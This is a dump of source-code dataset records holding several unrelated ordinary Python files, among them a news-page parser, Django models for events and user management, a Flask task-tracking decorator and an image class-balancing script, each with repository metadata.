return timestamp, lines | 31.3125 | 73 | 0.628743 | from bs4 import BeautifulSoup
import datetime
import unicodedata
def fetch_timeline(response):
'''
Fetch latest COVID-19 news.
Input: HTML content fetched from the web.
Return (
unix_timestamp,
list of paragraphs (unicode NFKC normalized)
)
'''
soup = BeautifulSoup(response, features="html.parser")
# Fetch latest news
timeline = soup.find("div", {"class": "timeline-detail"})
date = timeline.find("div", {"class": "timeline-head"}).text.strip()
content = timeline.find("div", {"class": "timeline-content"})
# Convert from string to datetime
date = datetime.datetime.strptime(date, '%H:%M %d/%m/%Y')
# Convert from UTF+7 to UTC+0
date = date - datetime.timedelta(hours=7)
timestamp = date.timestamp()
# Normalize content
content = unicodedata.normalize('NFKC', content.text).strip()
# Split lines
lines = content.splitlines()
return timestamp, lines | 0 | 0 | 0 |
b2ebe7a92be3a8e73bbfdd123e14e4e6615123d0 | 430 | py | Python | setup.py | horns-g/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | null | null | null | setup.py | horns-g/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | 2 | 2021-02-08T20:28:45.000Z | 2021-06-01T23:29:35.000Z | setup.py | IprelProgetti/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | null | null | null | import setuptools
REQUIRED_PACKAGES = []
PACKAGE_NAME = 'my_alice_pipeline'
PACKAGE_VERSION = '1.0.0'
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description='Alice in Wonderland pipeline',
url="https://github.com/horns-g/DataPipelines",
author="Gabriele Corni",
author_email="gabriele_corni@iprel.it",
install_requires=REQUIRED_PACKAGES,
packages=setuptools.find_packages(),
)
| 25.294118 | 51 | 0.746512 | import setuptools
REQUIRED_PACKAGES = []
PACKAGE_NAME = 'my_alice_pipeline'
PACKAGE_VERSION = '1.0.0'
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description='Alice in Wonderland pipeline',
url="https://github.com/horns-g/DataPipelines",
author="Gabriele Corni",
author_email="gabriele_corni@iprel.it",
install_requires=REQUIRED_PACKAGES,
packages=setuptools.find_packages(),
)
| 0 | 0 | 0 |
b503bd8d3bcd6f89278b0832a76f1d728ce42751 | 936 | py | Python | src/tree/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | lyphui/Just-Code | e0c3c3ecb67cb805080ff686e88522b2bffe7741 | [
"MIT"
] | 782 | 2019-11-19T08:20:49.000Z | 2022-03-25T06:59:09.000Z | src/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | Heitao5200/Just-Code | 5bb3ee485a103418e693b7ec8e26dc84f3691c79 | [
"MIT"
] | 1 | 2021-03-04T12:21:01.000Z | 2021-03-05T01:23:54.000Z | src/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | Heitao5200/Just-Code | 5bb3ee485a103418e693b7ec8e26dc84f3691c79 | [
"MIT"
] | 155 | 2019-11-20T08:20:42.000Z | 2022-03-19T07:28:09.000Z | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None | 40.695652 | 113 | 0.619658 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def maxAncestorDiff(self, root: TreeNode) -> int:
maxLeft = self.maxHelper(root.left, root.val, root.val)
maxRight = self.maxHelper(root.right, root.val, root.val)
return max(maxLeft, maxRight)
def maxHelper(self, root, minVal, maxVal):
if not root:
return abs(maxVal - minVal)
if root.val < minVal:
return max(self.maxHelper(root.left, root.val, maxVal), self.maxHelper(root.right, root.val, maxVal))
elif root.val > maxVal:
return max(self.maxHelper(root.left, minVal, root.val), self.maxHelper(root.right, minVal, root.val))
else:
return max(self.maxHelper(root.left, minVal, maxVal), self.maxHelper(root.right, minVal, maxVal)) | 701 | -6 | 80 |
1887534a7e5f28af7113d96d959b4059062f54ef | 2,037 | py | Python | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | null | null | null | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | 2 | 2019-06-04T20:41:30.000Z | 2019-06-10T17:44:58.000Z | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | 2 | 2019-06-04T20:37:00.000Z | 2019-06-10T17:53:41.000Z | from .config import Config
from flask import g, request
import traceback
from piperci.gman import client as gman_client
| 30.863636 | 87 | 0.518409 | from .config import Config
from flask import g, request
import traceback
from piperci.gman import client as gman_client
def gman_activate(status):
def decorator_func(func):
def wrapper_func(*args, **kwargs):
gman_url = Config["gman"]["url"]
function_name = f"{Config['name']}"
run_id = request.get_json().get("run_id")
project = request.get_json().get("project")
task = gman_client.request_new_task_id(
run_id=run_id,
gman_url=gman_url,
status=status,
project=project,
caller=function_name,
)
g.task = task
try:
func(*args, **kwargs)
gman_client.update_task_id(
gman_url=gman_url,
task_id=task["task"]["task_id"],
status="completed",
message=f"{function_name} completed successfully.",
)
return task
except Exception:
message = traceback.format_exc()
gman_client.update_task_id(
gman_url=gman_url,
status="failed",
task_id=task["task"]["task_id"],
message=f"Failed to execute {function_name}. Exception: {message}",
)
return task
return wrapper_func
return decorator_func
def gman_delegate(r, *args, **kwargs):
gman_url = Config["gman"]["url"]
if r.status_code == 202:
gman_client.update_task_id(
gman_url=gman_url,
task_id=g.task["task"]["task_id"],
status="delegated",
message=f"Delegated execution to {r.url}",
)
else:
gman_client.update_task_id(
gman_url=gman_url,
task_id=g.task["task"]["task_id"],
status="failed",
message=f"Failed to delegate execution to {r.url}",
)
return r
| 1,867 | 0 | 46 |
4df974424240e530d6a7c444cbba25488b0072fc | 5,042 | py | Python | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 1 | 2021-06-12T08:46:32.000Z | 2021-06-12T08:46:32.000Z | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 8 | 2020-07-01T15:06:52.000Z | 2022-02-20T09:11:23.000Z | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 3 | 2020-03-01T17:02:24.000Z | 2020-07-05T14:37:59.000Z | from django.core.validators import RegexValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
from dry_rest_permissions.generics import authenticated_users
from results.mixins.change_log import LogChangesMixing
from results.models.organizations import Organization
class Event(LogChangesMixing, models.Model):
"""Stores a single event.
Related to
- :class:`.organization.Organization`
"""
name = models.CharField(max_length=255, verbose_name=_('Name'))
description = models.TextField(blank=True, verbose_name=_('Description'))
date_start = models.DateField(verbose_name=_('Start date'))
date_end = models.DateField(verbose_name=_('End date'))
location = models.CharField(max_length=255, verbose_name=_('Location'))
organization = models.ForeignKey(Organization, on_delete=models.SET_NULL, null=True)
approved = models.BooleanField(default=False, verbose_name=_('Approved'))
locked = models.BooleanField(default=False, verbose_name=_('Edit lock'))
public = models.BooleanField(default=False, verbose_name=_('Public'))
categories = models.TextField(blank=True, verbose_name=_('Competition categories'))
optional_dates = models.TextField(blank=True, verbose_name=_('Optional dates'))
web_page = models.URLField(blank=True, verbose_name=_('Web page'))
invitation = models.URLField(blank=True, verbose_name=_('Invitation URL'))
notes = models.TextField(blank=True, verbose_name=_('Generic notes'))
safety_plan = models.BooleanField(default=False, verbose_name=_('Safety plan exists'))
international = models.BooleanField(default=False, verbose_name=_('International competition'))
toc_agreement = models.BooleanField(default=False, verbose_name=_('Terms and Conditions agreement'))
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated at'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
class EventContact(LogChangesMixing, models.Model):
"""Stores a single contact for the event.
Related to
- :class:`.events.EventRegistration`
"""
TYPE_CHOICES = [
('contact', _('Generic contact')),
('manager', _('Competition manager')),
('head judge', _('Head judge')),
('technical', _('Technical manager'))
]
phone_regex = RegexValidator(regex=r'^\+?1?\d{7,15}$',
message=_('Phone number may start with "+" and only contain digits.'))
event = models.ForeignKey(Event, on_delete=models.CASCADE)
type = models.CharField(max_length=10, choices=TYPE_CHOICES, verbose_name=_('Contact type'))
first_name = models.CharField(max_length=100, verbose_name=_('First name'))
last_name = models.CharField(max_length=100, verbose_name=_('Last name'))
email = models.EmailField(blank=True, verbose_name=_('Email address'))
phone = models.CharField(max_length=17, validators=[phone_regex], blank=True, verbose_name=_('Phone number'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
| 40.336 | 113 | 0.693971 | from django.core.validators import RegexValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
from dry_rest_permissions.generics import authenticated_users
from results.mixins.change_log import LogChangesMixing
from results.models.organizations import Organization
class Event(LogChangesMixing, models.Model):
"""Stores a single event.
Related to
- :class:`.organization.Organization`
"""
name = models.CharField(max_length=255, verbose_name=_('Name'))
description = models.TextField(blank=True, verbose_name=_('Description'))
date_start = models.DateField(verbose_name=_('Start date'))
date_end = models.DateField(verbose_name=_('End date'))
location = models.CharField(max_length=255, verbose_name=_('Location'))
organization = models.ForeignKey(Organization, on_delete=models.SET_NULL, null=True)
approved = models.BooleanField(default=False, verbose_name=_('Approved'))
locked = models.BooleanField(default=False, verbose_name=_('Edit lock'))
public = models.BooleanField(default=False, verbose_name=_('Public'))
categories = models.TextField(blank=True, verbose_name=_('Competition categories'))
optional_dates = models.TextField(blank=True, verbose_name=_('Optional dates'))
web_page = models.URLField(blank=True, verbose_name=_('Web page'))
invitation = models.URLField(blank=True, verbose_name=_('Invitation URL'))
notes = models.TextField(blank=True, verbose_name=_('Generic notes'))
safety_plan = models.BooleanField(default=False, verbose_name=_('Safety plan exists'))
international = models.BooleanField(default=False, verbose_name=_('International competition'))
toc_agreement = models.BooleanField(default=False, verbose_name=_('Terms and Conditions agreement'))
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated at'))
def __str__(self):
return '%s %s' % (self.date_start, self.name)
class Meta:
ordering = ['-date_start', 'name']
verbose_name = _('Event')
verbose_name_plural = _('Events')
@staticmethod
def has_read_permission(request):
return True
def has_object_read_permission(self, request):
return True
@staticmethod
@authenticated_users
def has_write_permission(request):
return True
@authenticated_users
def has_object_write_permission(self, request):
if (request.user.is_staff or request.user.is_superuser or
self.organization.group in request.user.groups.all() and
not self.locked):
return True
return False
@authenticated_users
def has_object_update_permission(self, request):
if (request.user.is_staff or request.user.is_superuser or
self.organization.group in request.user.groups.all() and
not self.locked):
return True
return False
class EventContact(LogChangesMixing, models.Model):
"""Stores a single contact for the event.
Related to
- :class:`.events.EventRegistration`
"""
TYPE_CHOICES = [
('contact', _('Generic contact')),
('manager', _('Competition manager')),
('head judge', _('Head judge')),
('technical', _('Technical manager'))
]
phone_regex = RegexValidator(regex=r'^\+?1?\d{7,15}$',
message=_('Phone number may start with "+" and only contain digits.'))
event = models.ForeignKey(Event, on_delete=models.CASCADE)
type = models.CharField(max_length=10, choices=TYPE_CHOICES, verbose_name=_('Contact type'))
first_name = models.CharField(max_length=100, verbose_name=_('First name'))
last_name = models.CharField(max_length=100, verbose_name=_('Last name'))
email = models.EmailField(blank=True, verbose_name=_('Email address'))
phone = models.CharField(max_length=17, validators=[phone_regex], blank=True, verbose_name=_('Phone number'))
def __str__(self):
return '%s: %s %s' % (self.type, self.first_name, self.last_name)
@staticmethod
def has_read_permission(request):
return True
def has_object_read_permission(self, request):
return True
@staticmethod
@authenticated_users
def has_write_permission(request):
return True
@authenticated_users
def has_object_write_permission(self, request):
if (request.user.is_staff or request.user.is_superuser or
self.event.organization.group in request.user.groups.all() and
not self.event.locked):
return True
return False
@authenticated_users
def has_object_update_permission(self, request):
if (request.user.is_staff or request.user.is_superuser or
self.event.organization.group in request.user.groups.all() and
not self.event.locked):
return True
return False
| 1,344 | 109 | 343 |
5a278cb657287dde3cbd4d5c426a4c6088ce0595 | 6,152 | py | Python | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | import os
import pandas
import PIL.Image as pil
import numpy
import shutil
from sklearn.model_selection import train_test_split as holdout
from sklearn.model_selection import StratifiedKFold as fold
from keras.preprocessing.image import ImageDataGenerator as idg
strOutputPath = "Output/"
try:
os.makedirs(strOutputPath)
except:
shutil.rmtree(strOutputPath)
os.makedirs(strOutputPath)
################################################################################
##
## 1. Balance holdout
##
## Train data
dataTrain = pandas.read_csv("Holdout/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Holdout/" + "Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Holdout/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Holdout/" + "Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
################################################################################
##
## 1. Balance fold
listFold = os.listdir("Fold/")
for strFold in listFold:
##
## Train data
dataTrain = pandas.read_csv("Fold/" + strFold + "/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Fold/" + strFold + "/Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Fold/" + strFold + "/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Fold/" + strFold + "/Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
| 38.691824 | 99 | 0.6263 | import os
import pandas
import PIL.Image as pil
import numpy
import shutil
from sklearn.model_selection import train_test_split as holdout
from sklearn.model_selection import StratifiedKFold as fold
from keras.preprocessing.image import ImageDataGenerator as idg
strOutputPath = "Output/"
try:
os.makedirs(strOutputPath)
except:
shutil.rmtree(strOutputPath)
os.makedirs(strOutputPath)
################################################################################
##
## 1. Balance holdout
##
## Train data
dataTrain = pandas.read_csv("Holdout/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Holdout/" + "Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Holdout/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Holdout/" + "Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
################################################################################
##
## 1. Balance fold
listFold = os.listdir("Fold/")
for strFold in listFold:
##
## Train data
dataTrain = pandas.read_csv("Fold/" + strFold + "/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Fold/" + strFold + "/Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Fold/" + strFold + "/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Fold/" + strFold + "/Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
| 0 | 0 | 0 |
eaf969f36fe620fba4812b6fe3efcad27770645a | 97 | py | Python | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | nome = str(input("Nome: ")).strip()
print('o nome tem silva {}'.format('silva' in nome.lower()))
| 32.333333 | 60 | 0.628866 | nome = str(input("Nome: ")).strip()
print('o nome tem silva {}'.format('silva' in nome.lower()))
| 0 | 0 | 0 |
00cfeed242a224515dc25bfcd65118925fba69a5 | 6,307 | py | Python | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | 6 | 2018-10-21T03:41:03.000Z | 2021-12-17T11:09:50.000Z | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | null | null | null | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | 4 | 2020-01-30T14:46:50.000Z | 2021-12-04T01:07:46.000Z | # coding:utf-8
from django.contrib.auth.models import AbstractUser, Permission
from django.db import models
# 部门
# 用户管理模块models
# class PermissionRead(models.Model):
# read_permission = models.OneToOneField(Permission, verbose_name='子模块权限')
# 全站管理models
# 配置管理分组
| 38.932099 | 104 | 0.718091 | # coding:utf-8
from django.contrib.auth.models import AbstractUser, Permission
from django.db import models
# 部门
class Departments(models.Model):
name = models.CharField(verbose_name='部门名称', max_length=50)
member_num = models.IntegerField(verbose_name='部门人数', default=0)
parent = models.IntegerField(verbose_name='所属部门', default=0)
level = models.IntegerField(verbose_name='部门级别', blank=True, null=True)
def __str__(self):
return self.name + '---' + str(self.id)
# 用户管理模块models
class User(AbstractUser):
nickname = models.CharField(verbose_name='姓名', max_length=50)
email_required = models.EmailField(verbose_name='电子邮箱', )
role = models.CharField(max_length=200, verbose_name='角色', blank=True, default='无角色')
class Meta:
verbose_name = '用户'
verbose_name_plural = verbose_name
ordering = ['-id']
def __str__(self):
return self.username
def save(self, *args, **kwargs):
super(User, self).save(*args, **kwargs)
groups_name = self.groups.all()
if self.is_superuser == 1:
self.role = '超级管理员'
elif len(groups_name) > 0:
groups_list = list()
for i in groups_name:
groups_list.append(i.name)
self.role = ','.join(groups_list)
else:
self.role = '无任何权限'
super(User, self).save(*args, **kwargs)
def re_save(self):
self.save()
# class PermissionRead(models.Model):
# read_permission = models.OneToOneField(Permission, verbose_name='子模块权限')
class PermissionGroups(models.Model):
groups_name = models.CharField(verbose_name='名称', max_length=50)
groups_permissions = models.ManyToManyField(Permission, verbose_name='权限', blank=True)
def __str__(self):
return self.groups_name
# 全站管理models
class AllSite(models.Model):
model_name = models.CharField(verbose_name='模块名称', max_length=20)
class Meta:
verbose_name = '全站爬虫'
verbose_name_plural = verbose_name
ordering = ['-id']
# 配置管理分组
class GroupConfigEach(models.Model):
name = models.CharField(verbose_name='组名', max_length=30)
user = models.ForeignKey(User, verbose_name='创建者')
def __str__(self):
return self.name
class Meta:
verbose_name = '配置分组'
verbose_name_plural = verbose_name
ordering = ['-id']
class GroupConfigManager(models.Model):
name = models.CharField(verbose_name='组名', max_length=30)
user = models.ForeignKey(User, verbose_name='创建者')
def __str__(self):
return self.name
class Meta:
verbose_name = '配置管理组'
verbose_name_plural = verbose_name
ordering = ['-id']
class UserConfigEach(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
group_config_each = models.ForeignKey(GroupConfigEach, on_delete=models.CASCADE)
level = models.IntegerField(default=0, blank=True)
class UserConfigManagerLevel(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
group_config_manager = models.ForeignKey(GroupConfigManager, on_delete=models.CASCADE)
level = models.IntegerField(default=0, blank=True)
class UserDeploy(models.Model):
user = models.ForeignKey(User, verbose_name='用户')
delta_domain_exclude = models.CharField(max_length=2000, verbose_name='时间差新闻域名排除', null=True)
delta_domain_exclude_group = models.CharField(max_length=200, verbose_name='时间差新闻域名排除', null=True)
delta_user_exclude = models.CharField(max_length=2000, verbose_name='时间差用户排除', null=True)
delta_user_exclude_group = models.CharField(max_length=200, verbose_name='时间差用户排除', null=True)
delta_config_exclude = models.CharField(max_length=2000, verbose_name='时间差新闻配置排除', null=True)
delta_config_exclude_group = models.CharField(max_length=200, verbose_name='时间差新闻配置排除', null=True)
config_groups_exclude = models.CharField(max_length=2000, verbose_name='配置分组排除', null=True)
config_groups_exclude_group = models.CharField(max_length=200, verbose_name='配置分组排除', null=True)
delta_alldomains_exclude = models.CharField(max_length=2000, verbose_name='所有域名排除', null=True)
delta_alldomains_exclude_group = models.CharField(max_length=200, verbose_name='所有域名排除', null=True)
delta_allconfigs_exclude = models.CharField(max_length=2000, verbose_name='所有配置排除', null=True)
delta_allconfigs_exclude_group = models.CharField(max_length=200, verbose_name='所有配置排除', null=True)
forums_domain_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛域名排除', null=True)
forums_domain_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛域名排除', null=True)
forums_user_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛域名不去重排除', null=True)
forums_user_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛域名不去重排除', null=True)
forums_config_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛配置排除', null=True)
forums_config_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛配置排除', null=True)
# 暂时使用
wx_url = models.IntegerField(verbose_name='微信静态url转换次数', default=0)
class ObjType(models.Model):
obj_name = models.CharField(max_length=100, verbose_name='对象名称', null=False)
obj_model = models.CharField(max_length=100, verbose_name='对象对应model', null=True)
class Meta:
verbose_name = '对象类型'
verbose_name_plural = verbose_name
ordering = ['-id']
class UserLog(models.Model):
user = models.ForeignKey(User, verbose_name='用户')
author = models.CharField(max_length=100, verbose_name='用户姓名')
app_label = models.CharField(max_length=100, verbose_name='app名称', null=True)
obj_type = models.CharField(max_length=100, verbose_name='对象类型', null=True)
obj = models.CharField(max_length=100, verbose_name='操作对象', null=True)
operate_type = models.CharField(max_length=100, verbose_name='操作类型', null=True)
